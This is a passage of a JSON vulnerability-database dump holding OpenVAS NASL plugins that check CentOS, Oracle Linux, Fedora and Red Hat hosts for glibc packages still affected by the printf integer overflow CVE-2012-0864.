script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "Oracle Linux Local Security Checks ELSA-2012-0397", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123951", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123951", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0397", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0397.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123951\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:10:44 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0397\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0397 - glibc security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0397\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0397.html\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~81.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~81.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~81.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~81.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~81.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~81.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-11T11:07:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "Check for the Version of glibc", "modified": "2018-01-09T00:00:00", "published": "2012-03-09T00:00:00", "id": "OPENVAS:863764", "href": "http://plugins.openvas.org/nasl.php?oid=863764", "type": "openvas", "title": "Fedora Update for glibc FEDORA-2012-2144", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glibc FEDORA-2012-2144\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"glibc on Fedora 15\";\ntag_insight = \"The glibc package contains standard libraries which are used by\n multiple programs on the system. In order to save disk space and\n memory, as well as to make upgrading easier, common system code is\n kept in one place and shared between programs. This particular package\n contains the most important sets of shared libraries: the standard C\n library and the standard math library. Without these two libraries, a\n Linux system will not function.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-March/074691.html\");\n script_id(863764);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-09 10:25:29 +0530 (Fri, 09 Mar 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-2144\");\n script_name(\"Fedora Update for glibc FEDORA-2012-2144\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.14.1~6\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881113", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881113", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0397 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0397 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-March/018506.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881113\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:10:49 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2012:0397\");\n script_name(\"CentOS Update for glibc CESA-2012:0397 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C and standard math libraries used\n by multiple programs on the system. Without these libraries, the Linux\n system cannot function correctly.\n\n An integer overflow flaw was found in the implementation of the printf\n functions family. This could allow an attacker to bypass FORTIFY_SOURCE\n protections and execute arbitrary code using a format string flaw in an\n application, even though these protections are expected to limit the impact\n of such flaws to an application abort. (CVE-2012-0864)\n\n All users of glibc are advised to upgrade to these updated packages, which\n contain a patch to resolve this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~81.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~81.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~81.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~81.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~81.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~81.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-02T10:57:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "Check for the Version of glibc", "modified": "2018-01-02T00:00:00", "published": "2012-03-22T00:00:00", "id": "OPENVAS:870576", "href": "http://plugins.openvas.org/nasl.php?oid=870576", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0397-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0397-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages provide the standard C and standard math libraries used\n by multiple programs on the system. Without these libraries, the Linux\n system cannot function correctly.\n\n An integer overflow flaw was found in the implementation of the printf\n functions family. This could allow an attacker to bypass FORTIFY_SOURCE\n protections and execute arbitrary code using a format string flaw in an\n application, even though these protections are expected to limit the impact\n of such flaws to an application abort. (CVE-2012-0864)\n\n All users of glibc are advised to upgrade to these updated packages, which\n contain a patch to resolve this issue.\";\n\ntag_affected = \"glibc on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-March/msg00013.html\");\n script_id(870576);\n script_version(\"$Revision: 8267 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 07:29:17 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-22 10:42:41 +0530 (Thu, 22 Mar 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2012:0397-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0397-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-03T10:58:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "Check for the Version of glibc", "modified": "2018-01-03T00:00:00", "published": "2012-07-09T00:00:00", "id": "OPENVAS:870673", "href": "http://plugins.openvas.org/nasl.php?oid=870673", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0393-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0393-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages provide the standard C and standard math libraries used\n by multiple programs on the system. Without these libraries, the Linux\n system cannot function correctly.\n\n An integer overflow flaw was found in the implementation of the printf\n functions family. This could allow an attacker to bypass FORTIFY_SOURCE\n protections and execute arbitrary code using a format string flaw in\n an application, even though these protections are expected to limit the\n impact of such flaws to an application abort. (CVE-2012-0864)\n\n This update also fixes the following bugs:\n\n * Previously, the dynamic loader generated an incorrect ordering for\n initialization according to the ELF specification. This could result in\n incorrect ordering of DSO constructors and destructors. With this update,\n dependency resolution has been fixed. (BZ#783999)\n\n * Previously, locking of the main malloc arena was incorrect in the retry\n path. This could result in a deadlock if an sbrk request failed. With this\n update, locking of the main arena in the retry path has been fixed. This\n issue was exposed by a bug fix provided in the RHSA-2012:0058 update.\n (BZ#795328)\n\n * Calling memcpy with overlapping arguments on certain processors would\n generate unexpected results. While such code is a clear violation of\n ANSI/ISO standards, this update restores prior memcpy behavior. (BZ#799259)\n\n All users of glibc are advised to upgrade to these updated packages, which\n contain patches to resolve these issues.\";\n\ntag_affected = \"glibc on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-March/msg00011.html\");\n script_id(870673);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:45:22 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2012:0393-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0393-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-03-22T00:00:00", "id": "OPENVAS:1361412562310870576", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870576", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0397-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0397-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-March/msg00013.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870576\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-22 10:42:41 +0530 (Thu, 22 Mar 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"RHSA\", value:\"2012:0397-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0397-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C and standard math libraries used\n by multiple programs on the system. Without these libraries, the Linux\n system cannot function correctly.\n\n An integer overflow flaw was found in the implementation of the printf\n functions family. This could allow an attacker to bypass FORTIFY_SOURCE\n protections and execute arbitrary code using a format string flaw in an\n application, even though these protections are expected to limit the impact\n of such flaws to an application abort. (CVE-2012-0864)\n\n All users of glibc are advised to upgrade to these updated packages, which\n contain a patch to resolve this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", 